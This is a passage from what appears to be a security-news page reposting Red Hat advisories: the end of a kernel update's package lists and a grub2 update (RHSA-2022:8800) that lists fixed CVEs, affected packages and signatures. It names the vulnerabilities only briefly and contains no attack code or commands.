kernel-devel-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-headers-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-modules-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-modules-extra-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-tools-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-tools-libs-4.18.0-372.36.1.el8_6.aarch64.rpm  
perf-4.18.0-372.36.1.el8_6.aarch64.rpm  
perf-debuginfo-4.18.0-372.36.1.el8_6.aarch64.rpm  
python3-perf-4.18.0-372.36.1.el8_6.aarch64.rpm  
python3-perf-debuginfo-4.18.0-372.36.1.el8_6.aarch64.rpm

noarch:  
kernel-abi-stablelists-4.18.0-372.36.1.el8_6.noarch.rpm  
kernel-doc-4.18.0-372.36.1.el8_6.noarch.rpm

ppc64le:  
bpftool-4.18.0-372.36.1.el8_6.ppc64le.rpm  
bpftool-debuginfo-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-core-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-cross-headers-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-debug-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-debug-core-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-debug-devel-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-debug-modules-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-debuginfo-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-devel-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-headers-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-modules-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-modules-extra-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-tools-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-tools-libs-4.18.0-372.36.1.el8_6.ppc64le.rpm  
perf-4.18.0-372.36.1.el8_6.ppc64le.rpm  
perf-debuginfo-4.18.0-372.36.1.el8_6.ppc64le.rpm  
python3-perf-4.18.0-372.36.1.el8_6.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-372.36.1.el8_6.ppc64le.rpm

s390x:  
bpftool-4.18.0-372.36.1.el8_6.s390x.rpm  
bpftool-debuginfo-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-core-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-cross-headers-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-debug-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-debug-core-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-debug-debuginfo-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-debug-devel-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-debug-modules-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-debug-modules-extra-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-debuginfo-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-devel-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-headers-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-modules-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-modules-extra-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-tools-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-tools-debuginfo-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-zfcpdump-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-zfcpdump-core-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-372.36.1.el8_6.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-372.36.1.el8_6.s390x.rpm  
perf-4.18.0-372.36.1.el8_6.s390x.rpm  
perf-debuginfo-4.18.0-372.36.1.el8_6.s390x.rpm  
python3-perf-4.18.0-372.36.1.el8_6.s390x.rpm  
python3-perf-debuginfo-4.18.0-372.36.1.el8_6.s390x.rpm

x86_64:  
bpftool-4.18.0-372.36.1.el8_6.x86_64.rpm  
bpftool-debuginfo-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-core-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-cross-headers-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-debug-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-debug-core-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-debug-devel-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-debug-modules-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-debuginfo-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-devel-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-headers-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-modules-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-modules-extra-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-tools-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-tools-libs-4.18.0-372.36.1.el8_6.x86_64.rpm  
perf-4.18.0-372.36.1.el8_6.x86_64.rpm  
perf-debuginfo-4.18.0-372.36.1.el8_6.x86_64.rpm  
python3-perf-4.18.0-372.36.1.el8_6.x86_64.rpm  
python3-perf-debuginfo-4.18.0-372.36.1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

aarch64:  
bpftool-debuginfo-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-debuginfo-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-372.36.1.el8_6.aarch64.rpm  
kernel-tools-libs-devel-4.18.0-372.36.1.el8_6.aarch64.rpm  
perf-debuginfo-4.18.0-372.36.1.el8_6.aarch64.rpm  
python3-perf-debuginfo-4.18.0-372.36.1.el8_6.aarch64.rpm

ppc64le:  
bpftool-debuginfo-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-debuginfo-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-372.36.1.el8_6.ppc64le.rpm  
kernel-tools-libs-devel-4.18.0-372.36.1.el8_6.ppc64le.rpm  
perf-debuginfo-4.18.0-372.36.1.el8_6.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-372.36.1.el8_6.ppc64le.rpm

x86_64:  
bpftool-debuginfo-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-debuginfo-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-372.36.1.el8_6.x86_64.rpm  
kernel-tools-libs-devel-4.18.0-372.36.1.el8_6.x86_64.rpm  
perf-debuginfo-4.18.0-372.36.1.el8_6.x86_64.rpm  
python3-perf-debuginfo-4.18.0-372.36.1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1158  
https://access.redhat.com/security/cve/CVE-2022-2639  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY487zdzjgjWX9erEAQjEAQ/9EQTsnAHyVlEVQ08iCd0RdZ1vLUr0P+oE  
N6krR4vXBkgdKc3A+I96Ak6M4HywsWhN837xIoa6l2OdaVhhjB28KawcgxeRNaD1  
RuVL8MxMSt6ySf6nDNVirdvRMdQNGRLkAsWcDOlKOj1hTm+KKKJhueARR0L/pbY1  
lk0Pi8HpL6YDbzw7+rmLONxA8o1nLeExAbm1oyi7gYXa/1j0W1fZWL8rABs4AiTV  
hF058uUfVSJ4pyDBqmIH8NojXPirkH5GkgrJ9B1yhgzMbB/sNq8XWnbWTHqBUmA0  
wG9e/2lhcQbWtUBidpgeK+mKZPrMdkLYKV8Kxedvi7+dPeFhULuxcQlzYGh2p0bs  
CqaDMnjzy0kLbneShZKYV0EmS8AyQBxVBBjgx1zSXEFExRnIOBl4uixXnMqlFtSn  
Oxh4TYezIf0dNW+mLI+px+Ej/LESDKwjWJtBmS47RCdeAFo5R7ntkRzUmrHsvxZT  
tZt962uZKlrke2DqDdHMYc0AmFvG+v+Lvf9GRe9Lg/OPPsdMnbxt2CxTBrhct7LL  
6wVNrw3TMve7W3k9ARzmR/xGHxozQ8HOTbfMSOBZbz4ppqzVQI92IkSzGfQVMM0e  
ERmVVMR/fymyPKk+HI/BzSAwXjbymD7qMD4HGqVLAZ+9VEfFWLGDIOJyyxjhvy0K  
6SkDuUnTzgM=  
=ZN/9  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8809-01

Red Hat Security Advisory 2022-8800-01 - The grub2 packages provide version 2 of the Grand Unified Boot Loader, a highly configurable and customizable boot loader with modular architecture. The packages support a variety of kernel formats, file systems, computer architectures, and hardware devices. Issues addressed include buffer overflow, bypass, and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: grub2 security update  
Advisory ID:       RHSA-2022:8800-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8800  
Issue date:        2022-12-06  
CVE Names:         CVE-2022-2601 CVE-2022-3775  
====================================================================  
1. Summary:

An update for grub2 is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS AUS (v. 8.2) - aarch64, noarch, x86_64  
Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - aarch64, noarch, ppc64le, x86_64  
Red Hat Enterprise Linux BaseOS TUS (v. 8.2) - aarch64, noarch, x86_64

3. Description:

The grub2 packages provide version 2 of the Grand Unified Boot Loader  
(GRUB), a highly configurable and customizable boot loader with modular  
architecture. The packages support a variety of kernel formats, file  
systems, computer architectures, and hardware devices.

Security Fix(es):

* grub2: Buffer overflow in grub_font_construct_glyph() can lead to  
out-of-bound write and possible secure boot bypass (CVE-2022-2601)

* grub2: Heap based out-of-bounds write when redering certain unicode  
sequences (CVE-2022-3775)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2112975 - CVE-2022-2601 grub2: Buffer overflow in grub_font_construct_glyph() can lead to out-of-bound write and possible secure boot bypass  
2138880 - CVE-2022-3775 grub2: Heap based out-of-bounds write when redering certain unicode sequences

6. Package List:

Red Hat Enterprise Linux BaseOS AUS (v. 8.2):

Source:  
grub2-2.02-87.el8_2.11.src.rpm

aarch64:  
grub2-debuginfo-2.02-87.el8_2.11.aarch64.rpm  
grub2-debugsource-2.02-87.el8_2.11.aarch64.rpm  
grub2-efi-aa64-2.02-87.el8_2.11.aarch64.rpm  
grub2-efi-aa64-cdboot-2.02-87.el8_2.11.aarch64.rpm  
grub2-tools-2.02-87.el8_2.11.aarch64.rpm  
grub2-tools-debuginfo-2.02-87.el8_2.11.aarch64.rpm  
grub2-tools-extra-2.02-87.el8_2.11.aarch64.rpm  
grub2-tools-extra-debuginfo-2.02-87.el8_2.11.aarch64.rpm  
grub2-tools-minimal-2.02-87.el8_2.11.aarch64.rpm  
grub2-tools-minimal-debuginfo-2.02-87.el8_2.11.aarch64.rpm

noarch:  
grub2-common-2.02-87.el8_2.11.noarch.rpm  
grub2-efi-aa64-modules-2.02-87.el8_2.11.noarch.rpm  
grub2-efi-ia32-modules-2.02-87.el8_2.11.noarch.rpm  
grub2-efi-x64-modules-2.02-87.el8_2.11.noarch.rpm  
grub2-pc-modules-2.02-87.el8_2.11.noarch.rpm  
grub2-ppc64le-modules-2.02-87.el8_2.11.noarch.rpm

x86_64:  
grub2-debuginfo-2.02-87.el8_2.11.x86_64.rpm  
grub2-debugsource-2.02-87.el8_2.11.x86_64.rpm  
grub2-efi-ia32-2.02-87.el8_2.11.x86_64.rpm  
grub2-efi-ia32-cdboot-2.02-87.el8_2.11.x86_64.rpm  
grub2-efi-x64-2.02-87.el8_2.11.x86_64.rpm  
grub2-efi-x64-cdboot-2.02-87.el8_2.11.x86_64.rpm  
grub2-pc-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-debuginfo-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-efi-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-efi-debuginfo-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-extra-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-extra-debuginfo-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-minimal-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-minimal-debuginfo-2.02-87.el8_2.11.x86_64.rpm

Red Hat Enterprise Linux BaseOS E4S (v. 8.2):

Source:  
grub2-2.02-87.el8_2.11.src.rpm

aarch64:  
grub2-debuginfo-2.02-87.el8_2.11.aarch64.rpm  
grub2-debugsource-2.02-87.el8_2.11.aarch64.rpm  
grub2-efi-aa64-2.02-87.el8_2.11.aarch64.rpm  
grub2-efi-aa64-cdboot-2.02-87.el8_2.11.aarch64.rpm  
grub2-tools-2.02-87.el8_2.11.aarch64.rpm  
grub2-tools-debuginfo-2.02-87.el8_2.11.aarch64.rpm  
grub2-tools-extra-2.02-87.el8_2.11.aarch64.rpm  
grub2-tools-extra-debuginfo-2.02-87.el8_2.11.aarch64.rpm  
grub2-tools-minimal-2.02-87.el8_2.11.aarch64.rpm  
grub2-tools-minimal-debuginfo-2.02-87.el8_2.11.aarch64.rpm

noarch:  
grub2-common-2.02-87.el8_2.11.noarch.rpm  
grub2-efi-aa64-modules-2.02-87.el8_2.11.noarch.rpm  
grub2-efi-ia32-modules-2.02-87.el8_2.11.noarch.rpm  
grub2-efi-x64-modules-2.02-87.el8_2.11.noarch.rpm  
grub2-pc-modules-2.02-87.el8_2.11.noarch.rpm  
grub2-ppc64le-modules-2.02-87.el8_2.11.noarch.rpm

ppc64le:  
grub2-debuginfo-2.02-87.el8_2.11.ppc64le.rpm  
grub2-debugsource-2.02-87.el8_2.11.ppc64le.rpm  
grub2-ppc64le-2.02-87.el8_2.11.ppc64le.rpm  
grub2-tools-2.02-87.el8_2.11.ppc64le.rpm  
grub2-tools-debuginfo-2.02-87.el8_2.11.ppc64le.rpm  
grub2-tools-extra-2.02-87.el8_2.11.ppc64le.rpm  
grub2-tools-extra-debuginfo-2.02-87.el8_2.11.ppc64le.rpm  
grub2-tools-minimal-2.02-87.el8_2.11.ppc64le.rpm  
grub2-tools-minimal-debuginfo-2.02-87.el8_2.11.ppc64le.rpm

x86_64:  
grub2-debuginfo-2.02-87.el8_2.11.x86_64.rpm  
grub2-debugsource-2.02-87.el8_2.11.x86_64.rpm  
grub2-efi-ia32-2.02-87.el8_2.11.x86_64.rpm  
grub2-efi-ia32-cdboot-2.02-87.el8_2.11.x86_64.rpm  
grub2-efi-x64-2.02-87.el8_2.11.x86_64.rpm  
grub2-efi-x64-cdboot-2.02-87.el8_2.11.x86_64.rpm  
grub2-pc-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-debuginfo-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-efi-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-efi-debuginfo-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-extra-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-extra-debuginfo-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-minimal-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-minimal-debuginfo-2.02-87.el8_2.11.x86_64.rpm

Red Hat Enterprise Linux BaseOS TUS (v. 8.2):

Source:  
grub2-2.02-87.el8_2.11.src.rpm

aarch64:  
grub2-debuginfo-2.02-87.el8_2.11.aarch64.rpm  
grub2-debugsource-2.02-87.el8_2.11.aarch64.rpm  
grub2-efi-aa64-2.02-87.el8_2.11.aarch64.rpm  
grub2-efi-aa64-cdboot-2.02-87.el8_2.11.aarch64.rpm  
grub2-tools-2.02-87.el8_2.11.aarch64.rpm  
grub2-tools-debuginfo-2.02-87.el8_2.11.aarch64.rpm  
grub2-tools-extra-2.02-87.el8_2.11.aarch64.rpm  
grub2-tools-extra-debuginfo-2.02-87.el8_2.11.aarch64.rpm  
grub2-tools-minimal-2.02-87.el8_2.11.aarch64.rpm  
grub2-tools-minimal-debuginfo-2.02-87.el8_2.11.aarch64.rpm

noarch:  
grub2-common-2.02-87.el8_2.11.noarch.rpm  
grub2-efi-aa64-modules-2.02-87.el8_2.11.noarch.rpm  
grub2-efi-ia32-modules-2.02-87.el8_2.11.noarch.rpm  
grub2-efi-x64-modules-2.02-87.el8_2.11.noarch.rpm  
grub2-pc-modules-2.02-87.el8_2.11.noarch.rpm  
grub2-ppc64le-modules-2.02-87.el8_2.11.noarch.rpm

x86_64:  
grub2-debuginfo-2.02-87.el8_2.11.x86_64.rpm  
grub2-debugsource-2.02-87.el8_2.11.x86_64.rpm  
grub2-efi-ia32-2.02-87.el8_2.11.x86_64.rpm  
grub2-efi-ia32-cdboot-2.02-87.el8_2.11.x86_64.rpm  
grub2-efi-x64-2.02-87.el8_2.11.x86_64.rpm  
grub2-efi-x64-cdboot-2.02-87.el8_2.11.x86_64.rpm  
grub2-pc-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-debuginfo-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-efi-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-efi-debuginfo-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-extra-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-extra-debuginfo-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-minimal-2.02-87.el8_2.11.x86_64.rpm  
grub2-tools-minimal-debuginfo-2.02-87.el8_2.11.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2601  
https://access.redhat.com/security/cve/CVE-2022-3775  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY48709zjgjWX9erEAQixIA//TpB3wu5k94D1/1vD5FhhfJ/M1DRIWo7H  
krG+DAzowq9XJlG7XB4hE6zCoVA3QcB5nXrNhG2zvQwscE63qLqOO+tXJYWeKEYz  
YlS2w1d0XeQaXvGAnlSF7Nn5AOiQakUKqg26ELIMzIwSCwD43ZkpWZApL75fG6+p  
g7iXECmzd5zgMTXKIsIAUpseQrvSeOIMugWRCamEBHdTuJUBNG4bhP9K3n54GcX/  
dpBkymPkCZRf7By0TruytLZosAz3EsPXvPoBqv5OZEudGSahaHJencmFIg1jua48  
t7vu3+YIPBUX3Zc4opRelYSZ4k7RgX0msoMd13MCS10U3vWQ/B1l0goA0nevkNrs  
cKeUUUm0J3koTzeBEYCnUtv+syUlmnOIYr/1WZnyOA+nTToaukv1L7br/U4qtpQc  
pUgFre8th+XgIgVd4kQSVEeNWDLK7obtoyiMCM42SycSvNFlRHodrC4TRw90XRu0  
o/g3rZptC6wOrL9qxOY0Ffd96DAnLhhYZTVek9MG1hH48luZheCiR93wfEfA3wX8  
zxR+Sr0K0FAlL1RhcoxS1CbA+Z6/4xAzihawzI6871KFI9obb8CtFvsUxBdLEQgu  
CAArmrNnjQ+NoALIRO7pxSMch0mSUvI9X9VpPKYB6uJdpDduZkBmxT9MrzPQzfmT  
o7l/PnGNEoM=HOFq  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#linux